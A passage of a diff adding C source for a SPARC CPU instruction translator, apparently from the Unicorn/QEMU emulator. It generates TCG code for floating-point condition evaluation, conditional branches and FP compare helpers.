FCC1 +static inline void gen_op_eval_fbu(DisasContext *dc, TCGv dst, TCGv src, + unsigned int fcc_offset) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + TCGv t0 = tcg_temp_new(tcg_ctx); + gen_mov_reg_FCC0(dc, dst, src, fcc_offset); + gen_mov_reg_FCC1(dc, t0, src, fcc_offset); + tcg_gen_and_tl(tcg_ctx, dst, dst, t0); + tcg_temp_free(tcg_ctx, t0); +} + +// 0: !(FCC0 | FCC1) +static inline void gen_op_eval_fbe(DisasContext *dc, TCGv dst, TCGv src, + unsigned int fcc_offset) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + TCGv t0 = tcg_temp_new(tcg_ctx); + gen_mov_reg_FCC0(dc, dst, src, fcc_offset); + gen_mov_reg_FCC1(dc, t0, src, fcc_offset); + tcg_gen_or_tl(tcg_ctx, dst, dst, t0); + tcg_gen_xori_tl(tcg_ctx, dst, dst, 0x1); + tcg_temp_free(tcg_ctx, t0); +} + +// 0 or 3: !(FCC0 ^ FCC1) +static inline void gen_op_eval_fbue(DisasContext *dc, TCGv dst, TCGv src, + unsigned int fcc_offset) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + TCGv t0 = tcg_temp_new(tcg_ctx); + gen_mov_reg_FCC0(dc, dst, src, fcc_offset); + gen_mov_reg_FCC1(dc, t0, src, fcc_offset); + tcg_gen_xor_tl(tcg_ctx, dst, dst, t0); + tcg_gen_xori_tl(tcg_ctx, dst, dst, 0x1); + tcg_temp_free(tcg_ctx, t0); +} + +// 0 or 2: !FCC0 +static inline void gen_op_eval_fbge(DisasContext *dc, TCGv dst, TCGv src, + unsigned int fcc_offset) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + gen_mov_reg_FCC0(dc, dst, src, fcc_offset); + tcg_gen_xori_tl(tcg_ctx, dst, dst, 0x1); +} + +// !1: !(FCC0 & !FCC1) +static inline void gen_op_eval_fbuge(DisasContext *dc, TCGv dst, TCGv src, + unsigned int fcc_offset) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + TCGv t0 = tcg_temp_new(tcg_ctx); + gen_mov_reg_FCC0(dc, dst, src, fcc_offset); + gen_mov_reg_FCC1(dc, t0, src, fcc_offset); + tcg_gen_andc_tl(tcg_ctx, dst, dst, t0); + tcg_gen_xori_tl(tcg_ctx, dst, dst, 0x1); + tcg_temp_free(tcg_ctx, t0); +} + +// 0 or 1: !FCC1 +static inline void gen_op_eval_fble(DisasContext *dc, TCGv dst, TCGv src, + unsigned int fcc_offset) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + gen_mov_reg_FCC1(dc, dst, src, fcc_offset); + tcg_gen_xori_tl(tcg_ctx, dst, dst, 0x1); +} + +// !2: !(!FCC0 & FCC1) +static inline void gen_op_eval_fbule(DisasContext *dc, TCGv dst, TCGv src, + unsigned int fcc_offset) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + TCGv t0 = tcg_temp_new(tcg_ctx); + gen_mov_reg_FCC0(dc, dst, src, fcc_offset); + gen_mov_reg_FCC1(dc, t0, src, fcc_offset); + tcg_gen_andc_tl(tcg_ctx, dst, t0, dst); + tcg_gen_xori_tl(tcg_ctx, dst, dst, 0x1); + tcg_temp_free(tcg_ctx, t0); +} + +// !3: !(FCC0 & FCC1) +static inline void gen_op_eval_fbo(DisasContext *dc, TCGv dst, TCGv src, + unsigned int fcc_offset) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + TCGv t0 = tcg_temp_new(tcg_ctx); + gen_mov_reg_FCC0(dc, dst, src, fcc_offset); + gen_mov_reg_FCC1(dc, t0, src, fcc_offset); + tcg_gen_and_tl(tcg_ctx, dst, dst, t0); + tcg_gen_xori_tl(tcg_ctx, dst, dst, 0x1); + tcg_temp_free(tcg_ctx, t0); +} + +static inline void gen_branch2(DisasContext *dc, target_ulong pc1, + target_ulong pc2, TCGv r_cond) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + int l1; + + l1 = gen_new_label(tcg_ctx); + + tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_EQ, r_cond, 0, l1); + + gen_goto_tb(dc, 0, pc1, pc1 + 4); + + gen_set_label(tcg_ctx, l1); + gen_goto_tb(dc, 1, pc2, pc2 + 4); +} + +static inline void gen_branch_a(DisasContext *dc, target_ulong pc1, + target_ulong pc2, TCGv r_cond) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + int l1; + + l1 = gen_new_label(tcg_ctx); + + tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_EQ, r_cond, 0, l1); + + gen_goto_tb(dc, 0, pc2, pc1); + + gen_set_label(tcg_ctx, l1); + gen_goto_tb(dc, 1, pc2 + 4, pc2 + 8); +} + +static inline void gen_generic_branch(DisasContext *dc) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + TCGv npc0 = tcg_const_tl(tcg_ctx, dc->jump_pc[0]); + TCGv npc1 = tcg_const_tl(tcg_ctx, dc->jump_pc[1]); + TCGv zero = tcg_const_tl(tcg_ctx, 0); + + tcg_gen_movcond_tl(tcg_ctx, TCG_COND_NE, *(TCGv *)tcg_ctx->cpu_npc, *(TCGv *)tcg_ctx->cpu_cond, zero, npc0, npc1); + + tcg_temp_free(tcg_ctx, npc0); + tcg_temp_free(tcg_ctx, npc1); + tcg_temp_free(tcg_ctx, zero); +} + +/* call this function before using the condition register as it may + have been set for a jump */ +static inline void flush_cond(DisasContext *dc) +{ + if (dc->npc == JUMP_PC) { + gen_generic_branch(dc); + dc->npc = DYNAMIC_PC; + } +} + +static inline void save_npc(DisasContext *dc) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + if (dc->npc == JUMP_PC) { + gen_generic_branch(dc); + dc->npc = DYNAMIC_PC; + } else if (dc->npc != DYNAMIC_PC) { + tcg_gen_movi_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_npc, dc->npc); + } +} + +static inline void update_psr(DisasContext *dc) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + if (dc->cc_op != CC_OP_FLAGS) { + dc->cc_op = CC_OP_FLAGS; + gen_helper_compute_psr(tcg_ctx, tcg_ctx->cpu_env); + } +} + +static inline void save_state(DisasContext *dc) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + tcg_gen_movi_tl(tcg_ctx, *(TCGv *)tcg_ctx->sparc_cpu_pc, dc->pc); + save_npc(dc); +} + +static inline void gen_mov_pc_npc(DisasContext *dc) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + if (dc->npc == JUMP_PC) { + gen_generic_branch(dc); + tcg_gen_mov_tl(tcg_ctx, *(TCGv *)tcg_ctx->sparc_cpu_pc, *(TCGv *)tcg_ctx->cpu_npc); + dc->pc = DYNAMIC_PC; + } else if (dc->npc == DYNAMIC_PC) { + tcg_gen_mov_tl(tcg_ctx, *(TCGv *)tcg_ctx->sparc_cpu_pc, *(TCGv *)tcg_ctx->cpu_npc); + dc->pc = DYNAMIC_PC; + } else { + dc->pc = dc->npc; + } +} + +static inline void gen_op_next_insn(DisasContext *dc) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + tcg_gen_mov_tl(tcg_ctx, *(TCGv *)tcg_ctx->sparc_cpu_pc, *(TCGv *)tcg_ctx->cpu_npc); + tcg_gen_addi_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_npc, *(TCGv *)tcg_ctx->cpu_npc, 4); +} + +static void free_compare(TCGContext *tcg_ctx, DisasCompare *cmp) +{ + if (!cmp->g1) { + tcg_temp_free(tcg_ctx, cmp->c1); + } + if (!cmp->g2) { + tcg_temp_free(tcg_ctx, cmp->c2); + } +} + +static void gen_compare(DisasContext *dc, DisasCompare *cmp, bool xcc, unsigned int cond) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + static int subcc_cond[16] = { + TCG_COND_NEVER, + TCG_COND_EQ, + TCG_COND_LE, + TCG_COND_LT, + TCG_COND_LEU, + TCG_COND_LTU, + -1, /* neg */ + -1, /* overflow */ + TCG_COND_ALWAYS, + TCG_COND_NE, + TCG_COND_GT, + TCG_COND_GE, + TCG_COND_GTU, + TCG_COND_GEU, + -1, /* pos */ + -1, /* no overflow */ + }; + + static int logic_cond[16] = { + TCG_COND_NEVER, + TCG_COND_EQ, /* eq: Z */ + TCG_COND_LE, /* le: Z | (N ^ V) -> Z | N */ + TCG_COND_LT, /* lt: N ^ V -> N */ + TCG_COND_EQ, /* leu: C | Z -> Z */ + TCG_COND_NEVER, /* ltu: C -> 0 */ + TCG_COND_LT, /* neg: N */ + TCG_COND_NEVER, /* vs: V -> 0 */ + TCG_COND_ALWAYS, + TCG_COND_NE, /* ne: !Z */ + TCG_COND_GT, /* gt: !(Z | (N ^ V)) -> !(Z | N) */ + TCG_COND_GE, /* ge: !(N ^ V) -> !N */ + TCG_COND_NE, /* gtu: !(C | Z) -> !Z */ + TCG_COND_ALWAYS, /* geu: !C -> 1 */ + TCG_COND_GE, /* pos: !N */ + TCG_COND_ALWAYS, /* vc: !V -> 1 */ + }; + + TCGv_i32 r_src; + TCGv r_dst; + +#ifdef TARGET_SPARC64 + if (xcc) { + r_src = tcg_ctx->cpu_xcc; + } else { + r_src = tcg_ctx->cpu_psr; + } +#else + r_src = tcg_ctx->cpu_psr; +#endif + + switch (dc->cc_op) { + case CC_OP_LOGIC: + cmp->cond = logic_cond[cond]; + do_compare_dst_0: + cmp->is_bool = false; + cmp->g2 = false; + cmp->c2 = tcg_const_tl(tcg_ctx, 0); +#ifdef TARGET_SPARC64 + if (!xcc) { + cmp->g1 = false; + cmp->c1 = tcg_temp_new(tcg_ctx); + tcg_gen_ext32s_tl(tcg_ctx, cmp->c1, *(TCGv *)tcg_ctx->cpu_cc_dst); + break; + } +#endif + cmp->g1 = true; + cmp->c1 = *(TCGv *)tcg_ctx->cpu_cc_dst; + break; + + case CC_OP_SUB: + switch (cond) { + case 6: /* neg */ + case 14: /* pos */ + cmp->cond = (cond == 6 ? TCG_COND_LT : TCG_COND_GE); + goto do_compare_dst_0; + + case 7: /* overflow */ + case 15: /* !overflow */ + goto do_dynamic; + + default: + cmp->cond = subcc_cond[cond]; + cmp->is_bool = false; +#ifdef TARGET_SPARC64 + if (!xcc) { + /* Note that sign-extension works for unsigned compares as + long as both operands are sign-extended. */ + cmp->g1 = cmp->g2 = false; + cmp->c1 = tcg_temp_new(tcg_ctx); + cmp->c2 = tcg_temp_new(tcg_ctx); + tcg_gen_ext32s_tl(tcg_ctx, cmp->c1, *(TCGv *)tcg_ctx->cpu_cc_src); + tcg_gen_ext32s_tl(tcg_ctx, cmp->c2, *(TCGv *)tcg_ctx->cpu_cc_src2); + break; + } +#endif + cmp->g1 = cmp->g2 = true; + cmp->c1 = *(TCGv *)tcg_ctx->cpu_cc_src; + cmp->c2 = *(TCGv *)tcg_ctx->cpu_cc_src2; + break; + } + break; + + default: + do_dynamic: + gen_helper_compute_psr(tcg_ctx, tcg_ctx->cpu_env); + dc->cc_op = CC_OP_FLAGS; + /* FALLTHRU */ + + case CC_OP_FLAGS: + /* We're going to generate a boolean result. */ + cmp->cond = TCG_COND_NE; + cmp->is_bool = true; + cmp->g1 = cmp->g2 = false; + cmp->c1 = r_dst = tcg_temp_new(tcg_ctx); + cmp->c2 = tcg_const_tl(tcg_ctx, 0); + + switch (cond) { + case 0x0: + gen_op_eval_bn(dc, r_dst); + break; + case 0x1: + gen_op_eval_be(dc, r_dst, r_src); + break; + case 0x2: + gen_op_eval_ble(dc, r_dst, r_src); + break; + case 0x3: + gen_op_eval_bl(dc, r_dst, r_src); + break; + case 0x4: + gen_op_eval_bleu(dc, r_dst, r_src); + break; + case 0x5: + gen_op_eval_bcs(dc, r_dst, r_src); + break; + case 0x6: + gen_op_eval_bneg(dc, r_dst, r_src); + break; + case 0x7: + gen_op_eval_bvs(dc, r_dst, r_src); + break; + case 0x8: + gen_op_eval_ba(dc, r_dst); + break; + case 0x9: + gen_op_eval_bne(dc, r_dst, r_src); + break; + case 0xa: + gen_op_eval_bg(dc, r_dst, r_src); + break; + case 0xb: + gen_op_eval_bge(dc, r_dst, r_src); + break; + case 0xc: + gen_op_eval_bgu(dc, r_dst, r_src); + break; + case 0xd: + gen_op_eval_bcc(dc, r_dst, r_src); + break; + case 0xe: + gen_op_eval_bpos(dc, r_dst, r_src); + break; + case 0xf: + gen_op_eval_bvc(dc, r_dst, r_src); + break; + } + break; + } +} + +static void gen_fcompare(DisasContext *dc, DisasCompare *cmp, unsigned int cc, unsigned int cond) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + unsigned int offset; + TCGv r_dst; + + /* For now we still generate a straight boolean result. */ + cmp->cond = TCG_COND_NE; + cmp->is_bool = true; + cmp->g1 = cmp->g2 = false; + cmp->c1 = r_dst = tcg_temp_new(tcg_ctx); + cmp->c2 = tcg_const_tl(tcg_ctx, 0); + + switch (cc) { + default: + case 0x0: + offset = 0; + break; + case 0x1: + offset = 32 - 10; + break; + case 0x2: + offset = 34 - 10; + break; + case 0x3: + offset = 36 - 10; + break; + } + + switch (cond) { + case 0x0: + gen_op_eval_bn(dc, r_dst); + break; + case 0x1: + gen_op_eval_fbne(dc, r_dst, *(TCGv *)tcg_ctx->cpu_fsr, offset); + break; + case 0x2: + gen_op_eval_fblg(dc, r_dst, *(TCGv *)tcg_ctx->cpu_fsr, offset); + break; + case 0x3: + gen_op_eval_fbul(dc, r_dst, *(TCGv *)tcg_ctx->cpu_fsr, offset); + break; + case 0x4: + gen_op_eval_fbl(dc, r_dst, *(TCGv *)tcg_ctx->cpu_fsr, offset); + break; + case 0x5: + gen_op_eval_fbug(dc, r_dst, *(TCGv *)tcg_ctx->cpu_fsr, offset); + break; + case 0x6: + gen_op_eval_fbg(dc, r_dst, *(TCGv *)tcg_ctx->cpu_fsr, offset); + break; + case 0x7: + gen_op_eval_fbu(dc, r_dst, *(TCGv *)tcg_ctx->cpu_fsr, offset); + break; + case 0x8: + gen_op_eval_ba(dc, r_dst); + break; + case 0x9: + gen_op_eval_fbe(dc, r_dst, *(TCGv *)tcg_ctx->cpu_fsr, offset); + break; + case 0xa: + gen_op_eval_fbue(dc, r_dst, *(TCGv *)tcg_ctx->cpu_fsr, offset); + break; + case 0xb: + gen_op_eval_fbge(dc, r_dst, *(TCGv *)tcg_ctx->cpu_fsr, offset); + break; + case 0xc: + gen_op_eval_fbuge(dc, r_dst, *(TCGv *)tcg_ctx->cpu_fsr, offset); + break; + case 0xd: + gen_op_eval_fble(dc, r_dst, *(TCGv *)tcg_ctx->cpu_fsr, offset); + break; + case 0xe: + gen_op_eval_fbule(dc, r_dst, *(TCGv *)tcg_ctx->cpu_fsr, offset); + break; + case 0xf: + gen_op_eval_fbo(dc, r_dst, *(TCGv *)tcg_ctx->cpu_fsr, offset); + break; + } +} + +static void gen_cond(DisasContext *dc, TCGv r_dst, unsigned int cc, unsigned int cond) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + DisasCompare cmp; + gen_compare(dc, &cmp, cc, cond); + + /* The interface is to return a boolean in r_dst. */ + if (cmp.is_bool) { + tcg_gen_mov_tl(tcg_ctx, r_dst, cmp.c1); + } else { + tcg_gen_setcond_tl(tcg_ctx, cmp.cond, r_dst, cmp.c1, cmp.c2); + } + + free_compare(tcg_ctx, &cmp); +} + +static void gen_fcond(DisasContext *dc, TCGv r_dst, unsigned int cc, unsigned int cond) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + DisasCompare cmp; + gen_fcompare(dc, &cmp, cc, cond); + + /* The interface is to return a boolean in r_dst. */ + if (cmp.is_bool) { + tcg_gen_mov_tl(tcg_ctx, r_dst, cmp.c1); + } else { + tcg_gen_setcond_tl(tcg_ctx, cmp.cond, r_dst, cmp.c1, cmp.c2); + } + + free_compare(tcg_ctx, &cmp); +} + +#ifdef TARGET_SPARC64 +// Inverted logic +static const int gen_tcg_cond_reg[8] = { + -1, + TCG_COND_NE, + TCG_COND_GT, + TCG_COND_GE, + -1, + TCG_COND_EQ, + TCG_COND_LE, + TCG_COND_LT, +}; + +static void gen_compare_reg(DisasContext *dc, DisasCompare *cmp, int cond, TCGv r_src) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + cmp->cond = tcg_invert_cond(gen_tcg_cond_reg[cond]); + cmp->is_bool = false; + cmp->g1 = true; + cmp->g2 = false; + cmp->c1 = r_src; + cmp->c2 = tcg_const_tl(tcg_ctx, 0); +} + +static inline void gen_cond_reg(DisasContext *dc, TCGv r_dst, int cond, TCGv r_src) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + DisasCompare cmp; + gen_compare_reg(dc, &cmp, cond, r_src); + + /* The interface is to return a boolean in r_dst. */ + tcg_gen_setcond_tl(tcg_ctx, cmp.cond, r_dst, cmp.c1, cmp.c2); + + free_compare(tcg_ctx, &cmp); +} +#endif + +static void do_branch(DisasContext *dc, int32_t offset, uint32_t insn, int cc) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + unsigned int cond = GET_FIELD(insn, 3, 6), a = (insn & (1 << 29)); + target_ulong target = dc->pc + offset; + +#ifdef TARGET_SPARC64 + if (unlikely(AM_CHECK(dc))) { + target &= 0xffffffffULL; + } +#endif + if (cond == 0x0) { + /* unconditional not taken */ + if (a) { + dc->pc = dc->npc + 4; + dc->npc = dc->pc + 4; + } else { + dc->pc = dc->npc; + dc->npc = dc->pc + 4; + } + } else if (cond == 0x8) { + /* unconditional taken */ + if (a) { + dc->pc = target; + dc->npc = dc->pc + 4; + } else { + dc->pc = dc->npc; + dc->npc = target; + tcg_gen_mov_tl(tcg_ctx, *(TCGv *)tcg_ctx->sparc_cpu_pc, *(TCGv *)tcg_ctx->cpu_npc); + } + } else { + flush_cond(dc); + gen_cond(dc, *(TCGv *)tcg_ctx->cpu_cond, cc, cond); + if (a) { + gen_branch_a(dc, target, dc->npc, *(TCGv *)tcg_ctx->cpu_cond); + dc->is_br = 1; + } else { + dc->pc = dc->npc; + dc->jump_pc[0] = target; + if (unlikely(dc->npc == DYNAMIC_PC)) { + dc->jump_pc[1] = DYNAMIC_PC; + tcg_gen_addi_tl(tcg_ctx, *(TCGv *)tcg_ctx->sparc_cpu_pc, *(TCGv *)tcg_ctx->cpu_npc, 4); + } else { + dc->jump_pc[1] = dc->npc + 4; + dc->npc = JUMP_PC; + } + } + } +} + +static void do_fbranch(DisasContext *dc, int32_t offset, uint32_t insn, int cc) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + unsigned int cond = GET_FIELD(insn, 3, 6), a = (insn & (1 << 29)); + target_ulong target = dc->pc + offset; + +#ifdef TARGET_SPARC64 + if (unlikely(AM_CHECK(dc))) { + target &= 0xffffffffULL; + } +#endif + if (cond == 0x0) { + /* unconditional not taken */ + if (a) { + dc->pc = dc->npc + 4; + dc->npc = dc->pc + 4; + } else { + dc->pc = dc->npc; + dc->npc = dc->pc + 4; + } + } else if (cond == 0x8) { + /* unconditional taken */ + if (a) { + dc->pc = target; + dc->npc = dc->pc + 4; + } else { + dc->pc = dc->npc; + dc->npc = target; + tcg_gen_mov_tl(tcg_ctx, *(TCGv *)tcg_ctx->sparc_cpu_pc, *(TCGv *)tcg_ctx->cpu_npc); + } + } else { + flush_cond(dc); + gen_fcond(dc, *(TCGv *)tcg_ctx->cpu_cond, cc, cond); + if (a) { + gen_branch_a(dc, target, dc->npc, *(TCGv *)tcg_ctx->cpu_cond); + dc->is_br = 1; + } else { + dc->pc = dc->npc; + dc->jump_pc[0] = target; + if (unlikely(dc->npc == DYNAMIC_PC)) { + dc->jump_pc[1] = DYNAMIC_PC; + tcg_gen_addi_tl(tcg_ctx, *(TCGv *)tcg_ctx->sparc_cpu_pc, *(TCGv *)tcg_ctx->cpu_npc, 4); + } else { + dc->jump_pc[1] = dc->npc + 4; + dc->npc = JUMP_PC; + } + } + } +} + +#ifdef TARGET_SPARC64 +static void do_branch_reg(DisasContext *dc, int32_t offset, uint32_t insn, + TCGv r_reg) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + unsigned int cond = GET_FIELD_SP(insn, 25, 27), a = (insn & (1 << 29)); + target_ulong target = dc->pc + offset; + + if (unlikely(AM_CHECK(dc))) { + target &= 0xffffffffULL; + } + flush_cond(dc); + gen_cond_reg(dc, *(TCGv *)tcg_ctx->cpu_cond, cond, r_reg); + if (a) { + gen_branch_a(dc, target, dc->npc, *(TCGv *)tcg_ctx->cpu_cond); + dc->is_br = 1; + } else { + dc->pc = dc->npc; + dc->jump_pc[0] = target; + if (unlikely(dc->npc == DYNAMIC_PC)) { + dc->jump_pc[1] = DYNAMIC_PC; + tcg_gen_addi_tl(tcg_ctx, *(TCGv *)tcg_ctx->sparc_cpu_pc, *(TCGv *)tcg_ctx->cpu_npc, 4); + } else { + dc->jump_pc[1] = dc->npc + 4; + dc->npc = JUMP_PC; + } + } +} + +static inline void gen_op_fcmps(DisasContext *dc, int fccno, TCGv_i32 r_rs1, TCGv_i32 r_rs2) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + switch (fccno) { + case 0: + gen_helper_fcmps(tcg_ctx, tcg_ctx->cpu_env, r_rs1, r_rs2); + break; + case 1: + gen_helper_fcmps_fcc1(tcg_ctx, tcg_ctx->cpu_env, r_rs1, r_rs2); + break; + case 2: + gen_helper_fcmps_fcc2(tcg_ctx, tcg_ctx->cpu_env, r_rs1, r_rs2); + break; + case 3: + gen_helper_fcmps_fcc3(tcg_ctx, tcg_ctx->cpu_env, r_rs1, r_rs2); + break; + } +} + +static inline void gen_op_fcmpd(DisasContext *dc, int fccno, TCGv_i64 r_rs1, TCGv_i64 r_rs2) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + switch (fccno) { + case 0: + gen_helper_fcmpd(tcg_ctx, tcg_ctx->cpu_env, r_rs1, r_rs2); + break; + case 1: + gen_helper_fcmpd_fcc1(tcg_ctx, tcg_ctx->cpu_env, r_rs1, r_rs2); + break; + case 2: + gen_helper_fcmpd_fcc2(tcg_ctx, tcg_ctx->cpu_env, r_rs1, r_rs2); + break; + case 3: + gen_helper_fcmpd_fcc3(tcg_ctx, tcg_ctx->cpu_env, r_rs1, r_rs2); + break; + } +} + +static inline void gen_op_fcmpq(DisasContext *dc, int fccno) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + switch (fccno) { + case 0: + gen_helper_fcmpq(tcg_ctx, tcg_ctx->cpu_env); + break; + case 1: + gen_helper_fcmpq_fcc1(tcg_ctx, tcg_ctx->cpu_env); + break; + case 2: + gen_helper_fcmpq_fcc2(tcg_ctx, tcg_ctx->cpu_env); + break; + case 3: + gen_helper_fcmpq_fcc3(tcg_ctx, tcg_ctx->cpu_env); + break; + } +} + +static inline void gen_op_fcmpes(DisasContext *dc, int fccno, TCGv_i32 r_rs1, TCGv_i32 r_rs2) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + switch (fccno) { + case 0: + gen_helper_fcmpes(tcg_ctx, tcg_ctx->cpu_env, r_rs1, r_rs2); + break; + case 1: + gen_helper_fcmpes_fcc1(tcg_ctx, tcg_ctx->cpu_env, r_rs1, r_rs2); + break; + case 2: + gen_helper_fcmpes_fcc2(tcg_ctx, tcg_ctx->cpu_env, r_rs1, r_rs2); + break; + case 3: + gen_helper_fcmpes_fcc3(tcg_ctx, tcg_ctx->cpu_env, r_rs1, r_rs2); + break; + } +} + +static inline void gen_op_fcmped(DisasContext *dc, int fccno, TCGv_i64 r_rs1, TCGv_i64 r_rs2) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + switch (fccno) { + case 0: + gen_helper_fcmped(tcg_ctx, tcg_ctx->cpu_env, r_rs1, r_rs2); + break; + case 1: + gen_helper_fcmped_fcc1(tcg_ctx, tcg_ctx->cpu_env, r_rs1, r_rs2); + break; + case 2: + gen_helper_fcmped_fcc2(tcg_ctx, tcg_ctx->cpu_env, r_rs1, r_rs2); + break; + case 3: + gen_helper_fcmped_fcc3(tcg_ctx, tcg_ctx->cpu_env, r_rs1, r_rs2); + break; + } +} + +static inline void gen_op_fcmpeq(DisasContext *dc, int fccno) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + switch (fccno) { + case 0: + gen_helper_fcmpeq(tcg_ctx, tcg_ctx->cpu_env); + break; + case 1: + gen_helper_fcmpeq_fcc1(tcg_ctx, tcg_ctx->cpu_env); + break; + case 2: + gen_helper_fcmpeq_fcc2(tcg_ctx, tcg_ctx->cpu_env); + break; + case 3: + gen_helper_fcmpeq_fcc3(tcg_ctx, tcg_ctx->cpu_env); + break; + } +} + +#else + +static inline void gen_op_fcmps(DisasContext *dc, int fccno, TCGv r_rs1, TCGv r_rs2) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + gen_helper_fcmps(tcg_ctx, tcg_ctx->cpu_env, r_rs1, r_rs2); +} + +static inline void gen_op_fcmpd(DisasContext *dc, int fccno, TCGv_i64 r_rs1, TCGv_i64 r_rs2) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + gen_helper_fcmpd(tcg_ctx, tcg_ctx->cpu_env, r_rs1, r_rs2); +} + +static inline void gen_op_fcmpq(DisasContext *dc, int fccno) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + gen_helper_fcmpq(tcg_ctx, tcg_ctx->cpu_env); +} + +static inline void gen_op_fcmpes(DisasContext *dc, int fccno, TCGv r_rs1, TCGv r_rs2) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + gen_helper_fcmpes(tcg_ctx, tcg_ctx->cpu_env, r_rs1, r_rs2); +} + +static inline void gen_op_fcmped(DisasContext *dc, int fccno, TCGv_i64 r_rs1, TCGv_i64 r_rs2) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + gen_helper_fcmped(tcg_ctx, tcg_ctx->cpu_env, r_rs1, r_rs2); +} + +static inline void gen_op_fcmpeq(DisasContext *dc, int fccno) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + gen_helper_fcmpeq(tcg_ctx, tcg_ctx->cpu_env); +} +#endif + +static inline void gen_op_fpexception_im(DisasContext *dc, int fsr_flags) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + TCGv_i32 r_const; + + tcg_gen_andi_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_fsr, *(TCGv *)tcg_ctx->cpu_fsr, FSR_FTT_NMASK); + tcg_gen_ori_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_fsr, *(TCGv *)tcg_ctx->cpu_fsr, fsr_flags); + r_const = tcg_const_i32(tcg_ctx, TT_FP_EXCP); + gen_helper_raise_exception(tcg_ctx, tcg_ctx->cpu_env, r_const); + tcg_temp_free_i32(tcg_ctx, r_const); +} + +static int gen_trap_ifnofpu(DisasContext *dc) +{ +#if !defined(CONFIG_USER_ONLY) + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + if (!dc->fpu_enabled) { + TCGv_i32 r_const; + + save_state(dc); + r_const = tcg_const_i32(tcg_ctx, TT_NFPU_INSN); + gen_helper_raise_exception(tcg_ctx, tcg_ctx->cpu_env, r_const); + tcg_temp_free_i32(tcg_ctx, r_const); + dc->is_br = 1; + return 1; + } +#endif + return 0; +} + +static inline void gen_op_clear_ieee_excp_and_FTT(DisasContext *dc) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + tcg_gen_andi_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_fsr, *(TCGv *)tcg_ctx->cpu_fsr, FSR_FTT_CEXC_NMASK); +} + +static inline void gen_fop_FF(DisasContext *dc, int rd, int rs, + void (*gen)(TCGContext *tcg_ctx, TCGv_i32, TCGv_ptr, TCGv_i32)) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + TCGv_i32 dst, src; + + src = gen_load_fpr_F(dc, rs); + dst = gen_dest_fpr_F(dc); + + gen(tcg_ctx, dst, tcg_ctx->cpu_env, src); + + gen_store_fpr_F(dc, rd, dst); +} + +static inline void gen_ne_fop_FF(DisasContext *dc, int rd, int rs, + void (*gen)(TCGContext *tcg_ctx, TCGv_i32, TCGv_i32)) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + TCGv_i32 dst, src; + + src = gen_load_fpr_F(dc, rs); + dst = gen_dest_fpr_F(dc); + + gen(tcg_ctx, dst, src); + + gen_store_fpr_F(dc, rd, dst); +} + +static inline void gen_fop_FFF(DisasContext *dc, int rd, int rs1, int rs2, + void (*gen)(TCGContext *tcg_ctx, TCGv_i32, TCGv_ptr, TCGv_i32, TCGv_i32)) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + TCGv_i32 dst, src1, src2; + + src1 = gen_load_fpr_F(dc, rs1); + src2 = gen_load_fpr_F(dc, rs2); + dst = gen_dest_fpr_F(dc); + + gen(tcg_ctx, dst, tcg_ctx->cpu_env, src1, src2); + + gen_store_fpr_F(dc, rd, dst); +} + +#ifdef TARGET_SPARC64 +static inline void gen_ne_fop_FFF(DisasContext *dc, int rd, int rs1, int rs2, + void (*gen)(TCGContext *tcg_ctx, TCGv_i32, TCGv_i32, TCGv_i32)) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + TCGv_i32 dst, src1, src2; + + src1 = gen_load_fpr_F(dc, rs1); + src2 = gen_load_fpr_F(dc, rs2); + dst = gen_dest_fpr_F(dc); + + gen(tcg_ctx, dst, src1, src2); + + gen_store_fpr_F(dc, rd, dst); +} +#endif + +static inline void gen_fop_DD(DisasContext *dc, int rd, int rs, + void (*gen)(TCGContext *tcg_ctx, TCGv_i64, TCGv_ptr, 